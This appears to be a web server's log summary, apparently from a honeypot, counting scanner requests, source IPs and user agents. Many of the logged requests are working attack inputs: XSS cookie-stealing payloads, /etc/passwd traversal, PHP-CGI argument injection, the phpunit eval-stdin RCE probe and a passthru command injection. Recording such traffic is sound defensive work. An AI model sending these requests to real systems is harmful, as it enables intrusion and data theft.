1 GET /ssi/envout.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\ HTTP/1.1
1 GET /stalker_portal/server/tools/auth_simple.php HTTP/1.1
1 GET /statrep.nsf HTTP/1.1
1 GET /status HTTP/1.1
1 GET /structure.sql HTTP/1.1
1 GET /submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview HTTP/1.1
1 GET /submit?setoption=q&option=allowed_ips&value=255.255.255.255 HTTP/1.1
1 GET /sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /support/messages HTTP/1.1
1 GET /supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; HTTP/1.1
1 GET /supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; HTTP/1.1
1 GET /supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; HTTP/1.1
1 GET /sysinfo.pl HTTP/1.1
1 GET /tcb/files/auth/r/root HTTP/1.1
2 GET /templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script> HTTP/1.1
1 GET /test-cgi.pl HTTP/1.1
1 GET /test-cgi HTTP/1.1
1 GET /test.cgi.php HTTP/1.1
1 GET /test.cgi HTTP/1.1
1 GET /test.php%20 HTTP/1.1
1 GET /test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x HTTP/1.1
1 GET /test.py HTTP/1.1
1 GET /test.sh HTTP/1.1
1 GET /test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x HTTP/1.1
1 GET /test_cgi.php HTTP/1.1
1 GET /test_cgi.pl HTTP/1.1
1 GET /test HTTP/1.1
1 GET /thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin HTTP/1.1
1 GET /themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script> HTTP/1.1
1 GET /ticket.php?id=99999 HTTP/1.1
1 GET /tiki/ HTTP/1.1
1 GET /tiki/tiki-install.php HTTP/1.1
1 GET /tmUnblock.cgi HTTP/1.1
1 GET /trace.axd HTTP/1.1
1 GET /tree HTTP/1.1
1 GET /tsweb/ HTTP/1.1
1 GET /tvcs/getservers.exe?action=selects1 HTTP/1.1
1 GET /typo/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00 HTTP/1.1
1 GET /typo/typo3conf/ HTTP/1.1
1 GET /typo/typo3conf/database.sql HTTP/1.1
1 GET /typo/typo3conf/localconf.php HTTP/1.1
1 GET /typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00 HTTP/1.1
1 GET /typo3/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00 HTTP/1.1
1 GET /typo3/typo3conf/ HTTP/1.1
1 GET /typo3/typo3conf/database.sql HTTP/1.1
1 GET /typo3/typo3conf/localconf.php HTTP/1.1
1 GET /typo3conf/ HTTP/1.1
1 GET /typo3conf/database.sql HTTP/1.1
1 GET /typo3conf/localconf.php HTTP/1.1
1 GET /uname.cgi HTTP/1.1
1 GET /upd/ HTTP/1.1
1 GET /upload.asp HTTP/1.1
1 GET /upload.cgi+ HTTP/1.1
1 GET /upload.php?type=\\\"<script>alert(document.cookie)</script> HTTP/1.1
1 GET /uploadn.asp HTTP/1.1
1 GET /uploadx.asp HTTP/1.1
1 GET /us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\\boot.ini HTTP/1.1
1 GET /usage/ HTTP/1.1
1 GET /user.php?op=userinfo&uname=<script>alert('hi');</script> HTTP/1.1
1 GET /usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27) HTTP/1.1
1 GET /userinfo.php?uid=1; HTTP/1.1
1 GET /users.lst HTTP/1.1
1 GET /users.php?mode=profile&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.1
1 GET /vchat/msg.txt HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /vgn/ac/data HTTP/1.1
1 GET /vgn/ac/delete HTTP/1.1
1 GET /vgn/ac/edit HTTP/1.1
1 GET /vgn/ac/esave HTTP/1.1
1 GET /vgn/ac/fsave HTTP/1.1
1 GET /vgn/ac/index HTTP/1.1
1 GET /vgn/asp/MetaDataUpdate HTTP/1.1
1 GET /vgn/asp/previewer HTTP/1.1
1 GET /vgn/asp/status HTTP/1.1
1 GET /vgn/asp/style HTTP/1.1
1 GET /vgn/errors HTTP/1.1
1 GET /vgn/jsp/controller HTTP/1.1
1 GET /vgn/jsp/errorpage HTTP/1.1
1 GET /vgn/jsp/initialize HTTP/1.1
1 GET /vgn/jsp/jspstatus56 HTTP/1.1
1 GET /vgn/jsp/jspstatus HTTP/1.1
1 GET /vgn/jsp/metadataupdate HTTP/1.1
1 GET /vgn/jsp/previewer HTTP/1.1
1 GET /vgn/jsp/style HTTP/1.1
1 GET /vgn/legacy/edit HTTP/1.1
1 GET /vgn/legacy/save HTTP/1.1
1 GET /vgn/license HTTP/1.1
1 GET /vgn/login/1,501,,00.html?cookieName=x--\\> HTTP/1.1
1 GET /vgn/login HTTP/1.1
1 GET /vgn/performance/TMT/Report/XML HTTP/1.1
1 GET /vgn/performance/TMT/Report HTTP/1.1
1 GET /vgn/performance/TMT/reset HTTP/1.1
1 GET /vgn/performance/TMT HTTP/1.1
1 GET /vgn/ppstats HTTP/1.1
1 GET /vgn/previewer HTTP/1.1
1 GET /vgn/record/previewer HTTP/1.1
1 GET /vgn/style HTTP/1.1
1 GET /vgn/stylepreviewer HTTP/1.1
1 GET /vgn/vr/Deleting HTTP/1.1
1 GET /vgn/vr/Editing HTTP/1.1
1 GET /vgn/vr/Saving HTTP/1.1
1 GET /vgn/vr/Select HTTP/1.1
1 GET /vider.php3 HTTP/1.1
1 GET /view_source.jsp HTTP/1.1
1 GET /viewcvs.cgi HTTP/1.1
1 GET /viewpage.php?file=/etc/passwd HTTP/1.1
2 GET /viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
2 GET /viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /w-agora/ HTTP/1.1
1 GET /wa.exe HTTP/1.1
1 GET /web-console/ServerInfo.jsp%00 HTTP/1.1
1 GET /web.config HTTP/1.1
1 GET /web/ HTTP/1.1
1 GET /webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif HTTP/1.1
1 GET /webMathematica/MSP?MSPStoreID=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini&MSPStoreType=image/gif HTTP/1.1
1 GET /webadmin.nsf HTTP/1.1
1 GET /webalizer/ HTTP/1.1
1 GET /webamil/test.php?mode=phpinfo HTTP/1.1
1 GET /webamil/test.php HTTP/1.1
1 GET /webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script> HTTP/1.1
1 GET /webcart-lite/config/import.txt HTTP/1.1
1 GET /webcart-lite/orders/import.txt HTTP/1.1
1 GET /webcart/carts/ HTTP/1.1
1 GET /webcart/config/ HTTP/1.1
1 GET /webcart/config/clients.txt HTTP/1.1
1 GET /webcart/orders/ HTTP/1.1
1 GET /webcart/orders/import.txt HTTP/1.1
1 GET /webcgi/ HTTP/1.1
1 GET /webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\\\"Vulnerable\\\")</script>&email1=<script>alert%20(\\\"Vulnerable\\\")</script> HTTP/1.1
1 GET /weblogic HTTP/1.1
1 GET /webmail/ HTTP/1.1
1 GET /webmail/blank.html HTTP/1.1
1 GET /webmail/horde/test.php HTTP/1.1
1 GET /webtop/wdk/ HTTP/1.1
1 GET /webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef HTTP/1.1
1 GET /webtop/wdk/samples/index.jsp HTTP/1.1
1 GET /welcome HTTP/1.1
1 GET /whatever.htr HTTP/1.1
1 GET /whatever79C8.html HTTP/1.1
1 GET /whois.cgi HTTP/1.1
1 GET /wp-content/ HTTP/1.1
1 GET /ws_ftp.ini HTTP/1.1
1 GET /wwwboard/passwd.txt HTTP/1.1
1 GET /wx/s.dll?d=/boot.ini HTTP/1.1
1 GET /xFpZpuLF.* HTTP/1.1
1 GET /xFpZpuLF.00RelNotes HTTP/1.1
1 GET /xFpZpuLF.1 HTTP/1.1
1 GET /xFpZpuLF.2 HTTP/1.1
1 GET /xFpZpuLF.AP HTTP/1.1
1 GET /xFpZpuLF.ASP HTTP/1.1
1 GET /xFpZpuLF.BBoardServlet HTTP/1.1
1 GET /xFpZpuLF.Big5 HTTP/1.1
1 GET /xFpZpuLF.CGI HTTP/1.1
1 GET /xFpZpuLF.EXE HTTP/1.1
1 GET /xFpZpuLF.Htm HTTP/1.1
1 GET /xFpZpuLF.INC HTTP/1.1
1 GET /xFpZpuLF.JSP HTTP/1.1
1 GET /xFpZpuLF.LCDispatcher HTTP/1.1
1 GET /xFpZpuLF.LOG HTTP/1.1
1 GET /xFpZpuLF.MVC HTTP/1.1
1 GET /xFpZpuLF.PRINT HTTP/1.1
1 GET /xFpZpuLF.PWD HTTP/1.1
1 GET /xFpZpuLF.SHOW HTTP/1.1
1 GET /xFpZpuLF.SMAIL893 HTTP/1.1
1 GET /xFpZpuLF.SSIFilter HTTP/1.1
1 GET /xFpZpuLF.TPF HTTP/1.1
1 GET /xFpZpuLF.TXT HTTP/1.1
1 GET /xFpZpuLF.UploadServlet HTTP/1.1
1 GET /xFpZpuLF.VALIDATE_STMT HTTP/1.1
1 GET /xFpZpuLF._ HTTP/1.1
1 GET /xFpZpuLF. HTTP/1.1
1 GET /xFpZpuLF.access HTTP/1.1
1 GET /xFpZpuLF.adjunct HTTP/1.1
1 GET /xFpZpuLF.apw HTTP/1.1
1 GET /xFpZpuLF.asa HTTP/1.1
1 GET /xFpZpuLF.asmx HTTP/1.1
1 GET /xFpZpuLF.asp+ HTTP/1.1
1 GET /xFpZpuLF.asp HTTP/1.1
1 GET /xFpZpuLF.aspx HTTP/1.1
1 GET /xFpZpuLF.axd HTTP/1.1
1 GET /xFpZpuLF.back HTTP/1.1
1 GET /xFpZpuLF.backup HTTP/1.1
1 GET /xFpZpuLF.bak HTTP/1.1
1 GET /xFpZpuLF.bas HTTP/1.1
1 GET /xFpZpuLF.bat|dir HTTP/1.1
1 GET /xFpZpuLF.bat HTTP/1.1
1 GET /xFpZpuLF.bin HTTP/1.1
1 GET /xFpZpuLF.blt HTTP/1.1
1 GET /xFpZpuLF.box HTTP/1.1
1 GET /xFpZpuLF.btr HTTP/1.1
1 GET /xFpZpuLF.c HTTP/1.1
1 GET /xFpZpuLF.ca HTTP/1.1
1 GET /xFpZpuLF.cellsprint HTTP/1.1
1 GET /xFpZpuLF.cfc HTTP/1.1
1 GET /xFpZpuLF.cfg HTTP/1.1
1 GET /xFpZpuLF.cfm HTTP/1.1
1 GET /xFpZpuLF.cgi+ HTTP/1.1
1 GET /xFpZpuLF.cgi HTTP/1.1
1 GET /xFpZpuLF.chl+ HTTP/1.1
1 GET /xFpZpuLF.class HTTP/1.1
1 GET /xFpZpuLF.cmd HTTP/1.1
1 GET /xFpZpuLF.cnf HTTP/1.1
1 GET /xFpZpuLF.cobalt HTTP/1.1
1 GET /xFpZpuLF.com HTTP/1.1
1 GET /xFpZpuLF.conf HTTP/1.1
1 GET /xFpZpuLF.config HTTP/1.1
1 GET /xFpZpuLF.config~ HTTP/1.1
1 GET /xFpZpuLF.cp-1251 HTTP/1.1
1 GET /xFpZpuLF.cp866 HTTP/1.1
1 GET /xFpZpuLF.cs HTTP/1.1
1 GET /xFpZpuLF.csc HTTP/1.1
1 GET /xFpZpuLF.csp HTTP/1.1
1 GET /xFpZpuLF.cwr HTTP/1.1
1 GET /xFpZpuLF.dat HTTP/1.1
1 GET /xFpZpuLF.db HTTP/1.1
1 GET /xFpZpuLF.dbc HTTP/1.1
1 GET /xFpZpuLF.dbm HTTP/1.1
1 GET /xFpZpuLF.de HTTP/1.1
1 GET /xFpZpuLF.dk HTTP/1.1
1 GET /xFpZpuLF.dll HTTP/1.1
1 GET /xFpZpuLF.do HTTP/1.1
1 GET /xFpZpuLF.dpgs HTTP/1.1
1 GET /xFpZpuLF.dtd HTTP/1.1
1 GET /xFpZpuLF.ee HTTP/1.1
1 GET /xFpZpuLF.el HTTP/1.1
1 GET /xFpZpuLF.eml HTTP/1.1
1 GET /xFpZpuLF.en HTTP/1.1
1 GET /xFpZpuLF.epl HTTP/1.1
1 GET /xFpZpuLF.es HTTP/1.1
1 GET /xFpZpuLF.et HTTP/1.1
1 GET /xFpZpuLF.exe|dir HTTP/1.1
1 GET /xFpZpuLF.exe HTTP/1.1
1 GET /xFpZpuLF.fhp HTTP/1.1
1 GET /xFpZpuLF.fr HTTP/1.1
1 GET /xFpZpuLF.genpopuplist HTTP/1.1
1 GET /xFpZpuLF.gif HTTP/1.1
1 GET /xFpZpuLF.grp HTTP/1.1
1 GET /xFpZpuLF.gz HTTP/1.1
1 GET /xFpZpuLF.home HTTP/1.1
1 GET /xFpZpuLF.htaccess HTTP/1.1
1 GET /xFpZpuLF.htaccess~ HTTP/1.1
1 GET /xFpZpuLF.htm HTTP/1.1
1 GET /xFpZpuLF.html+ HTTP/1.1
1 GET /xFpZpuLF.html HTTP/1.1
1 GET /xFpZpuLF.html~ HTTP/1.1
1 GET /xFpZpuLF.htpasswd HTTP/1.1
1 GET /xFpZpuLF.htr HTTP/1.1
1 GET /xFpZpuLF.htw HTTP/1.1
1 GET /xFpZpuLF.ida HTTP/1.1
1 GET /xFpZpuLF.idc HTTP/1.1
1 GET /xFpZpuLF.idq HTTP/1.1
1 GET /xFpZpuLF.inc+ HTTP/1.1
1 GET /xFpZpuLF.inc HTTP/1.1
1 GET /xFpZpuLF.ini HTTP/1.1
1 GET /xFpZpuLF.iso-ru HTTP/1.1
1 GET /xFpZpuLF.iso2022-jp HTTP/1.1
1 GET /xFpZpuLF.iso2022-kr HTTP/1.1
1 GET /xFpZpuLF.iso8859-2 HTTP/1.1
1 GET /xFpZpuLF.iso8859-8 HTTP/1.1
1 GET /xFpZpuLF.it HTTP/1.1
1 GET /xFpZpuLF.java HTTP/1.1
1 GET /xFpZpuLF.js0x70 HTTP/1.1
1 GET /xFpZpuLF.js HTTP/1.1
1 GET /xFpZpuLF.jsa HTTP/1.1
1 GET /xFpZpuLF.jse HTTP/1.1
1 GET /xFpZpuLF.jsp+ HTTP/1.1
1 GET /xFpZpuLF.jsp HTTP/1.1
1 GET /xFpZpuLF.koi8-r HTTP/1.1
1 GET /xFpZpuLF.lasso HTTP/1.1
1 GET /xFpZpuLF.lic HTTP/1.1
1 GET /xFpZpuLF.link HTTP/1.1
1 GET /xFpZpuLF.list HTTP/1.1
1 GET /xFpZpuLF.listprint HTTP/1.1
1 GET /xFpZpuLF.local HTTP/1.1
1 GET /xFpZpuLF.log HTTP/1.1
1 GET /xFpZpuLF.lst HTTP/1.1
1 GET /xFpZpuLF.map HTTP/1.1
1 GET /xFpZpuLF.mdb+ HTTP/1.1
1 GET /xFpZpuLF.mdb HTTP/1.1
1 GET /xFpZpuLF.mediawiki HTTP/1.1
1 GET /xFpZpuLF.ml HTTP/1.1
1 GET /xFpZpuLF.ncf HTTP/1.1
1 GET /xFpZpuLF.net HTTP/1.1
1 GET /xFpZpuLF.nl HTTP/1.1
1 GET /xFpZpuLF.nlm HTTP/1.1
1 GET /xFpZpuLF.nn HTTP/1.1
1 GET /xFpZpuLF.no HTTP/1.1
1 GET /xFpZpuLF.notes HTTP/1.1
1 GET /xFpZpuLF.nsconfig HTTP/1.1
1 GET /xFpZpuLF.nsf HTTP/1.1
1 GET /xFpZpuLF.nsfdeslo HTTP/1.1
1 GET /xFpZpuLF.old HTTP/1.1
1 GET /xFpZpuLF.org HTTP/1.1
1 GET /xFpZpuLF.orig HTTP/1.1
1 GET /xFpZpuLF.passwd HTTP/1.1
1 GET /xFpZpuLF.password HTTP/1.1
1 GET /xFpZpuLF.pdf HTTP/1.1
1 GET /xFpZpuLF.php+ HTTP/1.1
1 GET /xFpZpuLF.php3+ HTTP/1.1
1 GET /xFpZpuLF.php3 HTTP/1.1
1 GET /xFpZpuLF.php4 HTTP/1.1
1 GET /xFpZpuLF.php HTTP/1.1
1 GET /xFpZpuLF.phtml HTTP/1.1
1 GET /xFpZpuLF.pl|dir HTTP/1.1
1 GET /xFpZpuLF.pl HTTP/1.1
1 GET /xFpZpuLF.pm HTTP/1.1
1 GET /xFpZpuLF.prf HTTP/1.1
1 GET /xFpZpuLF.printer HTTP/1.1
1 GET /xFpZpuLF.priv HTTP/1.1
1 GET /xFpZpuLF.properties HTTP/1.1
1 GET /xFpZpuLF.pt-br HTTP/1.1
1 GET /xFpZpuLF.pt HTTP/1.1
1 GET /xFpZpuLF.pw HTTP/1.1
1 GET /xFpZpuLF.pwd HTTP/1.1
1 GET /xFpZpuLF.py HTTP/1.1
1 GET /xFpZpuLF.rdf+destype=cache+desformat=PDF HTTP/1.1
1 GET /xFpZpuLF.render_css HTTP/1.1
1 GET /xFpZpuLF.render_warning_screen HTTP/1.1
1 GET /xFpZpuLF.save HTTP/1.1
1 GET /xFpZpuLF.se HTTP/1.1
1 GET /xFpZpuLF.sh HTTP/1.1
1 GET /xFpZpuLF.shm HTTP/1.1
1 GET /xFpZpuLF.show_query_columns HTTP/1.1
1 GET /xFpZpuLF.show HTTP/1.1
1 GET /xFpZpuLF.showsource HTTP/1.1
1 GET /xFpZpuLF.shtm HTTP/1.1
1 GET /xFpZpuLF.shtml HTTP/1.1
1 GET /xFpZpuLF.signature HTTP/1.1
1 GET /xFpZpuLF.snp HTTP/1.1
1 GET /xFpZpuLF.sql HTTP/1.1
1 GET /xFpZpuLF.sqlite HTTP/1.1
1 GET /xFpZpuLF.stat HTTP/1.1
1 GET /xFpZpuLF.stm HTTP/1.1
1 GET /xFpZpuLF.sys HTTP/1.1
1 GET /xFpZpuLF.tcl HTTP/1.1
1 GET /xFpZpuLF.thtml HTTP/1.1
1 GET /xFpZpuLF.tml HTTP/1.1
1 GET /xFpZpuLF.tmp HTTP/1.1
1 GET /xFpZpuLF.tw HTTP/1.1
1 GET /xFpZpuLF.txt HTTP/1.1
1 GET /xFpZpuLF.types HTTP/1.1
1 GET /xFpZpuLF.utf8 HTTP/1.1
1 GET /xFpZpuLF.var HTTP/1.1
1 GET /xFpZpuLF.vts HTTP/1.1
1 GET /xFpZpuLF.www_acl HTTP/1.1
1 GET /xFpZpuLF.wwwacl HTTP/1.1
1 GET /xFpZpuLF.xbb HTTP/1.1
1 GET /xFpZpuLF.xls HTTP/1.1
1 GET /xFpZpuLF.xml+ HTTP/1.1
2 GET /xFpZpuLF.xml HTTP/1.1
1 GET /xFpZpuLF.xsl HTTP/1.1
1 GET /xFpZpuLF.xslt HTTP/1.1
1 GET /xFpZpuLF.xsql HTTP/1.1
1 GET /xFpZpuLF.xtp HTTP/1.1
1 GET /xFpZpuLF.zip HTTP/1.1
1 GET /xFpZpuLF/ HTTP/1.1
1 GET /xFpZpuLF[.]10:100 HTTP/1.1
1 GET /xFpZpuLF[.]bas:ShowVolume HTTP/1.1
1 GET /xFpZpuLF HTTP/1.1
1 GET /z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825& HTTP/1.1
1 GET /zorum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt; HTTP/1.1
1 GET /~/<script>alert('Vulnerable')</script>.asp HTTP/1.1
1 GET /~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null HTTP/1.1
1 GET /~/<script>alert('Vulnerable')</script>.aspx HTTP/1.1
1 GET /~bin HTTP/1.1
1 GET /~root/ HTTP/1.1
2 GET http[:]//example[.]com/ HTTP/1.1
2 HEAD /118.cer HTTP/1.1
2 HEAD /118.jks HTTP/1.1
2 HEAD /118.pem HTTP/1.1
2 HEAD /118.tar.bz2 HTTP/1.1
2 HEAD /118.tar.gz HTTP/1.1
2 HEAD /118.tar.lzma HTTP/1.1
2 HEAD /118.tar HTTP/1.1
2 HEAD /118.tgz HTTP/1.1
2 HEAD /118.zip HTTP/1.1
2 HEAD /34.68.118.83.cer HTTP/1.1
2 HEAD /34.68.118.83.jks HTTP/1.1
2 HEAD /34.68.118.83.pem HTTP/1.1
2 HEAD /34.68.118.83.tar.bz2 HTTP/1.1
2 HEAD /34.68.118.83.tar.gz HTTP/1.1
2 HEAD /34.68.118.83.tar.lzma HTTP/1.1
2 HEAD /34.68.118.83.tar HTTP/1.1
2 HEAD /34.68.118.83.tgz HTTP/1.1
2 HEAD /34.68.118.83.zip HTTP/1.1
2 HEAD /34.68.118.cer HTTP/1.1
2 HEAD /34.68.118.jks HTTP/1.1
2 HEAD /34.68.118.pem HTTP/1.1
2 HEAD /34.68.118.tar.bz2 HTTP/1.1
2 HEAD /34.68.118.tar.gz HTTP/1.1
2 HEAD /34.68.118.tar.lzma HTTP/1.1
2 HEAD /34.68.118.tar HTTP/1.1
2 HEAD /34.68.118.tgz HTTP/1.1
2 HEAD /34.68.118.zip HTTP/1.1
2 HEAD /34.68.cer HTTP/1.1
2 HEAD /34.68.jks HTTP/1.1
2 HEAD /34.68.pem HTTP/1.1
2 HEAD /34.68.tar.bz2 HTTP/1.1
2 HEAD /34.68.tar.gz HTTP/1.1
2 HEAD /34.68.tar.lzma HTTP/1.1
2 HEAD /34.68.tar HTTP/1.1
2 HEAD /34.68.tgz HTTP/1.1
2 HEAD /34.68.zip HTTP/1.1
2 HEAD /34.cer HTTP/1.1
2 HEAD /34.jks HTTP/1.1
2 HEAD /34.pem HTTP/1.1
2 HEAD /34.tar.bz2 HTTP/1.1
2 HEAD /34.tar.gz HTTP/1.1
2 HEAD /34.tar.lzma HTTP/1.1
2 HEAD /34.tar HTTP/1.1
2 HEAD /34.tgz HTTP/1.1
2 HEAD /34.zip HTTP/1.1
2 HEAD /3468.cer HTTP/1.1
2 HEAD /3468.jks HTTP/1.1
2 HEAD /3468.pem HTTP/1.1
2 HEAD /3468.tar.bz2 HTTP/1.1
2 HEAD /3468.tar.gz HTTP/1.1
2 HEAD /3468.tar.lzma HTTP/1.1
2 HEAD /3468.tar HTTP/1.1
2 HEAD /3468.tgz HTTP/1.1
2 HEAD /3468.zip HTTP/1.1
2 HEAD /3468118.cer HTTP/1.1
2 HEAD /3468118.jks HTTP/1.1
2 HEAD /3468118.pem HTTP/1.1
2 HEAD /3468118.tar.bz2 HTTP/1.1
2 HEAD /3468118.tar.gz HTTP/1.1
2 HEAD /3468118.tar.lzma HTTP/1.1
2 HEAD /3468118.tar HTTP/1.1
2 HEAD /3468118.tgz HTTP/1.1
2 HEAD /3468118.zip HTTP/1.1
2 HEAD /346811883.cer HTTP/1.1
2 HEAD /346811883.jks HTTP/1.1
2 HEAD /346811883.pem HTTP/1.1
2 HEAD /346811883.tar.bz2 HTTP/1.1
2 HEAD /346811883.tar.gz HTTP/1.1
2 HEAD /346811883.tar.lzma HTTP/1.1
2 HEAD /346811883.tar HTTP/1.1
2 HEAD /346811883.tgz HTTP/1.1
2 HEAD /346811883.zip HTTP/1.1
2 HEAD /34_68_118_83.cer HTTP/1.1
2 HEAD /34_68_118_83.jks HTTP/1.1
2 HEAD /34_68_118_83.pem HTTP/1.1
2 HEAD /34_68_118_83.tar.bz2 HTTP/1.1
2 HEAD /34_68_118_83.tar.gz HTTP/1.1
2 HEAD /34_68_118_83.tar.lzma HTTP/1.1
2 HEAD /34_68_118_83.tar HTTP/1.1
2 HEAD /34_68_118_83.tgz HTTP/1.1
2 HEAD /34_68_118_83.zip HTTP/1.1
2 HEAD /68.cer HTTP/1.1
2 HEAD /68.jks HTTP/1.1
2 HEAD /68.pem HTTP/1.1
2 HEAD /68.tar.bz2 HTTP/1.1
2 HEAD /68.tar.gz HTTP/1.1
2 HEAD /68.tar.lzma HTTP/1.1
2 HEAD /68.tar HTTP/1.1
2 HEAD /68.tgz HTTP/1.1
2 HEAD /68.zip HTTP/1.1
2 HEAD /83.cer HTTP/1.1
2 HEAD /83.jks HTTP/1.1
2 HEAD /83.pem HTTP/1.1
2 HEAD /83.tar.bz2 HTTP/1.1
2 HEAD /83.tar.gz HTTP/1.1
2 HEAD /83.tar.lzma HTTP/1.1
2 HEAD /83.tar HTTP/1.1
2 HEAD /83.tgz HTTP/1.1
2 HEAD /83.zip HTTP/1.1
3 HEAD / HTTP/1.1
2 HEAD /backup.cer HTTP/1.1
2 HEAD /backup.jks HTTP/1.1
2 HEAD /backup.pem HTTP/1.1
2 HEAD /backup.tar.bz2 HTTP/1.1
2 HEAD /backup.tar.gz HTTP/1.1
2 HEAD /backup.tar.lzma HTTP/1.1
2 HEAD /backup.tar HTTP/1.1
2 HEAD /backup.tgz HTTP/1.1
2 HEAD /backup.zip HTTP/1.1
2 HEAD /site.cer HTTP/1.1
2 HEAD /site.jks HTTP/1.1
2 HEAD /site.pem HTTP/1.1
2 HEAD /site.tar.bz2 HTTP/1.1
2 HEAD /site.tar.gz HTTP/1.1
2 HEAD /site.tar.lzma HTTP/1.1
2 HEAD /site.tar HTTP/1.1
2 HEAD /site.tgz HTTP/1.1
2 HEAD /site.zip HTTP/1.1
1 INDEX / HTTP/1.1
1 OPTIONS * HTTP/1.1
1 OPTIONS / HTTP/1.1
1 POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
1 POST /Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000 HTTP/1.1
1 POST /_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false HTTP/1.1
1 POST /_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false HTTP/1.1
1 POST /_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611 HTTP/1.1
1 POST /_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611 HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/../../../../bin/sh HTTP/1.1
1 POST /cgi-bin/lastlines.cgi?process HTTP/1.1
1 POST /cgi-bin/post-query HTTP/1.1
1 POST /servlet/CookieExample?cookiename=<script>alert(\\\"Vulnerable\\\")</script> HTTP/1.1
1 POST /servlet/custMsg?guestName=<script>alert(\\\"Vulnerable\\\")</script> HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 PRI * HTTP/2.0
1 PROPFIND / HTTP/1.1
1 PUT /nikto-test-cetkweDa.html HTTP/1.1
1 TRACE / HTTP/1.0
2 TRACK / HTTP/1.0
1 WPWEVMKD / HTTP/1.1
1 get / HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 23.128.248.84 United States
119 31.164.170.62 Switzerland
1 43.129.181.68 Singapore
1 45.61.188.169 United States
1 45.148.10.81 Romania
1 68.66.164.26 United States
1 94.232.41.218 Russia
1 103.217.123.242 India
1 143.198.27.209 United States
18 156.96.154.202 United States
2 157.230.216.203 United States
1 167.248.133.47 United States
1 180.149.125.162 Mongolia
119 187.103.207.172 Brazil
1 192.241.205.198 United States
1 192.241.208.74 United States
1 192.241.220.229 United States
1 193.124.7.9 Czechia
1 205.210.31.13 United States

UserAgent一覧

件数 UserAgent
7 -
2 Go-http-client/1.1
1 Hello, world
